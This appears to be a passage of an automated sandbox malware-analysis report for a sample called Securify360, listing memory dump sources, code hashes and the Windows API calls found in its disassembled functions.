                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 327935632-0
                                                                                              • Opcode ID: 79dbb23ee11c5a2dc7e3aedf8f7a42b0a4990b8b982c1221efa2cf1788576a64
                                                                                              • Instruction ID: 1e2abc1af887a7bfe737a4ad09c708bea55ba39b48cd836e14a0a98428cc3beb
                                                                                              • Opcode Fuzzy Hash: 79dbb23ee11c5a2dc7e3aedf8f7a42b0a4990b8b982c1221efa2cf1788576a64
                                                                                              • Instruction Fuzzy Hash: 83516775A002099FEB12EF68C8848AEB7F4FF09310F14C4A9F955AB352DB35A945CF91
                                                                                              APIs
                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FFEC62
                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FFEC8B
                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FFECCA
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FFECEF
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FFECF7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1389676194-0
                                                                                              • Opcode ID: 67ef85675b10f7ecb1934734a460b897c4c500e49e847d4bcb354f282152e578
                                                                                              • Instruction ID: d55af945c2366f6cd91b1902237e53daa48a99199cb4b48f06eb14cde3bb9605
                                                                                              • Opcode Fuzzy Hash: 67ef85675b10f7ecb1934734a460b897c4c500e49e847d4bcb354f282152e578
                                                                                              • Instruction Fuzzy Hash: BB513739A00209DFDF11EF64C981EAEBBF5EF49314B148099E949AB361DB35AD01EB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0eae21c429e3ef28b9228b16fb3698576eda04b8a85d67d259ace2687c21e5de
                                                                                              • Instruction ID: b3c048e1398f6c1ca7228d69f823c704c148815d0587e19630ff382fa171179e
                                                                                              • Opcode Fuzzy Hash: 0eae21c429e3ef28b9228b16fb3698576eda04b8a85d67d259ace2687c21e5de
                                                                                              • Instruction Fuzzy Hash: 7641D435A02294EFE760DE68CC44FAABBF4FB09320F140195F997A72D9C7789A41DB50
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 00F92727
                                                                                              • ScreenToClient.USER32(010577B0,?), ref: 00F92744
                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00F92769
                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 00F92777
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                              • String ID:
                                                                                              • API String ID: 4210589936-0
                                                                                              • Opcode ID: c6006184b5456655c173c0df081de512778123c05b3d47d7dd8f5420de2fcd3b
                                                                                              • Instruction ID: c2141aede749939301bb14e5a9a5db497a719abfade62344873087def69c99b0
                                                                                              • Opcode Fuzzy Hash: c6006184b5456655c173c0df081de512778123c05b3d47d7dd8f5420de2fcd3b
                                                                                              • Instruction Fuzzy Hash: C841603590411AFFDF659EA8C948FE9BB74FB05330F208319F868A2294C7359D50EB91
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00FE95E8
                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00FE9692
                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FE969A
                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00FE96A8
                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FE96B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3382505437-0
                                                                                              • Opcode ID: 920f116794ad6785f6c344316403a0018376ed8b54bf5e19836d529b4ff23efe
                                                                                              • Instruction ID: 8fe061afd4546894dc5a224d6ade76da2923db8358a5652a20745a7b2d08e777
                                                                                              • Opcode Fuzzy Hash: 920f116794ad6785f6c344316403a0018376ed8b54bf5e19836d529b4ff23efe
                                                                                              • Instruction Fuzzy Hash: CF31EE71904259EFDF20CF69D94CA9E7BB5FB44325F20421AF824AB1D4C3B09910EBA0
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00FEBD9D
                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FEBDBA
                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FEBDF2
                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FEBE18
                                                                                              • _wcsstr.LIBCMT ref: 00FEBE22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                              • String ID:
                                                                                              • API String ID: 3902887630-0
                                                                                              • Opcode ID: 6e7d2cd42ba25fa09e6b2315a85260150ad3494b2d99e89bdc65ffd4418c98a7
                                                                                              • Instruction ID: 40131b814f5c19daba4a6035f87d2b360dd474725ee5c83e72839bfd10d4cfc6
                                                                                              • Opcode Fuzzy Hash: 6e7d2cd42ba25fa09e6b2315a85260150ad3494b2d99e89bdc65ffd4418c98a7
                                                                                              • Instruction Fuzzy Hash: CA212932604244BBEB355F76DC49EBB7B9DDF88760F208029F909CA195EF65CC40A7A0
                                                                                              APIs
                                                                                                • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0101B804
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0101B829
                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0101B841
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 0101B86A
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0100155C,00000000), ref: 0101B888
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2294984445-0
                                                                                              • Opcode ID: 725b4091271a4b18963158e7b8ae80629279cffb90db761eea9ff6bd4e8ce28f
                                                                                              • Instruction ID: edb0da3ecb4cde6b186b989530b4e177960e84b54ed8ae7b7a02b637bd7a455f
                                                                                              • Opcode Fuzzy Hash: 725b4091271a4b18963158e7b8ae80629279cffb90db761eea9ff6bd4e8ce28f
                                                                                              • Instruction Fuzzy Hash: EC21A371910225AFDB649E3CCC08B6A3BB4FB05B24F244768FDA5D31D8D7398810CB80
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FE9ED8
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FE9F0A
                                                                                              • __itow.LIBCMT ref: 00FE9F22
                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FE9F4A
                                                                                              • __itow.LIBCMT ref: 00FE9F5B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$__itow$_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2983881199-0
                                                                                              • Opcode ID: 5c928ce919488cbfbaf98a5c6a415c5c550aa544d13fa6e31f1d28635ddcb250
                                                                                              • Instruction ID: bf29f9c8fa096fdb3d2d7d96d66337c6bec93ed908e3fd091208e6aa85eb6c40
                                                                                              • Opcode Fuzzy Hash: 5c928ce919488cbfbaf98a5c6a415c5c550aa544d13fa6e31f1d28635ddcb250
                                                                                              • Instruction Fuzzy Hash: A021DA31B05384BBDB309E568C89EEE7BA9EF89720F144025F901DB141D6B4C945BBE1
                                                                                              APIs
                                                                                              • IsWindow.USER32(00000000), ref: 01006159
                                                                                              • GetForegroundWindow.USER32 ref: 01006170
                                                                                              • GetDC.USER32(00000000), ref: 010061AC
                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 010061B8
                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 010061F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                              • String ID:
                                                                                              • API String ID: 4156661090-0
                                                                                              • Opcode ID: af63d0b355a03fcdd9e744f94862a6e0f359ff64ddeae354777a3756803d1e2d
                                                                                              • Instruction ID: 3d0c296c87d561be59b94adcfd719965c9624ecc7ecb27f7192734b892ff1a08
                                                                                              • Opcode Fuzzy Hash: af63d0b355a03fcdd9e744f94862a6e0f359ff64ddeae354777a3756803d1e2d
                                                                                              • Instruction Fuzzy Hash: BC21D875A002049FE720EF64DC88AAABBF5EF48310F148479F98AD7356CB35AC01DB90
                                                                                              APIs
                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F91729
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00F91738
                                                                                              • BeginPath.GDI32(?), ref: 00F9174F
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00F91778
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                              • String ID:
                                                                                              • API String ID: 3225163088-0
                                                                                              • Opcode ID: b01013a82ae3ea4ccffc159725397337c3451ef81b068781a6db5ab370e1b79d
                                                                                              • Instruction ID: 731712be282c5b89177bf477d023bfe073c3917d93f86b11f3337b2bbd09c725
                                                                                              • Opcode Fuzzy Hash: b01013a82ae3ea4ccffc159725397337c3451ef81b068781a6db5ab370e1b79d
                                                                                              • Instruction Fuzzy Hash: E121B330C0030AEFEF319F64D944B7A7BA8F710321F644226F89596298D77B9895EB91
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: 242fa7146fe378d34bb751338772e083f52dd9213ee8e1dbb8b0b3adafdd1956
                                                                                              • Instruction ID: 933a50957fbf53d98ebd1c339b87d07e5f283738ebad7a0231c03f9672f270cb
                                                                                              • Opcode Fuzzy Hash: 242fa7146fe378d34bb751338772e083f52dd9213ee8e1dbb8b0b3adafdd1956
                                                                                              • Instruction Fuzzy Hash: FE01F563A001193BD21065139E92FFB731DBA24394F044129FE069B301E768DF12A6E1
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00FF5075
                                                                                              • __beginthreadex.LIBCMT ref: 00FF5093
                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00FF50A8
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FF50BE
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FF50C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                              • String ID:
                                                                                              • API String ID: 3824534824-0
                                                                                              • Opcode ID: 4304cd774a5ec5b01d79f50dd2f6ed9291fc1e48c6922a4a7bc5839df07ae992
                                                                                              • Instruction ID: 039346005e33e08c2317f0cc8841ff852f2ad2af24970f1857baa1ef3a674701
                                                                                              • Opcode Fuzzy Hash: 4304cd774a5ec5b01d79f50dd2f6ed9291fc1e48c6922a4a7bc5839df07ae992
                                                                                              • Instruction Fuzzy Hash: C411447290470DBFC7208FA89C08AAB7FACAF45320F644256FA18D3355DA7A890097F0
                                                                                              APIs
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FE8E3C
                                                                                              • GetLastError.KERNEL32(?,00FE8900,?,?,?), ref: 00FE8E46
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00FE8900,?,?,?), ref: 00FE8E55
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00FE8900,?,?,?), ref: 00FE8E5C
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FE8E73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 842720411-0
                                                                                              • Opcode ID: 3c50a08bb025e1a867b11ac411185a697b67a5f487c411c1b74c1774be65eaf6
                                                                                              • Instruction ID: 1616072e476b7ef378206ef37f8a52b648ff4d937111053c4853bae2cdd3c03c
                                                                                              • Opcode Fuzzy Hash: 3c50a08bb025e1a867b11ac411185a697b67a5f487c411c1b74c1774be65eaf6
                                                                                              • Instruction Fuzzy Hash: A8016D71601344BFDB305FA6DC48D6B7BADEF893A4B240569F889C2214DB329C01DB60
                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF581B
                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FF5829
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5831
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FF583B
                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5877
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                              • String ID:
                                                                                              • API String ID: 2833360925-0
                                                                                              • Opcode ID: 8102d82243f8649ebe316f1aa4b8359066f1ce50ca7b58b8b0331ec0c3fbbb8d
                                                                                              • Instruction ID: 6c4d7792da18d5c9d07095fff8f4844ad9717127eae6b861155aa236eaf9bd49
                                                                                              • Opcode Fuzzy Hash: 8102d82243f8649ebe316f1aa4b8359066f1ce50ca7b58b8b0331ec0c3fbbb8d
                                                                                              • Instruction Fuzzy Hash: 8301DE31C01A1DDBDF209FE4E849AEDBBB8FF0CB10F200156EA42B2158CB398510DBA1
                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7C62,80070057,?,?,?,00FE8073), ref: 00FE7D45
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7C62,80070057,?,?), ref: 00FE7D60
                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7C62,80070057,?,?), ref: 00FE7D6E
                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7C62,80070057,?), ref: 00FE7D7E
                                                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7C62,80070057,?,?), ref: 00FE7D8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3897988419-0
                                                                                              • Opcode ID: 6cc7e1c6d8cc9ff08f495e0ba027495941897dabfb6bd2f37597ba3d0d9ee113
                                                                                              • Instruction ID: 429c8378f1132cada708d838ec51de35c1e5c6e2b26b5985da5ac489cdc24c0c
                                                                                              • Opcode Fuzzy Hash: 6cc7e1c6d8cc9ff08f495e0ba027495941897dabfb6bd2f37597ba3d0d9ee113
                                                                                              • Instruction Fuzzy Hash: 6A01B172A01314ABDB305F15DC04BAA7BADEF44761F204054FD48D2208D7B6DD00DBE0
                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FE8CDE
                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FE8CE8
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FE8CF7
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FE8CFE
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FE8D14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: e526a91aeb177d681b522c6bc30cf15ad33cc996b7786d025ddd550210a524b9
                                                                                              • Instruction ID: 013d2f4ad317e528cc6cefbff6b5d7836b511ae9b3e30ac50d7ba5efee016892
                                                                                              • Opcode Fuzzy Hash: e526a91aeb177d681b522c6bc30cf15ad33cc996b7786d025ddd550210a524b9
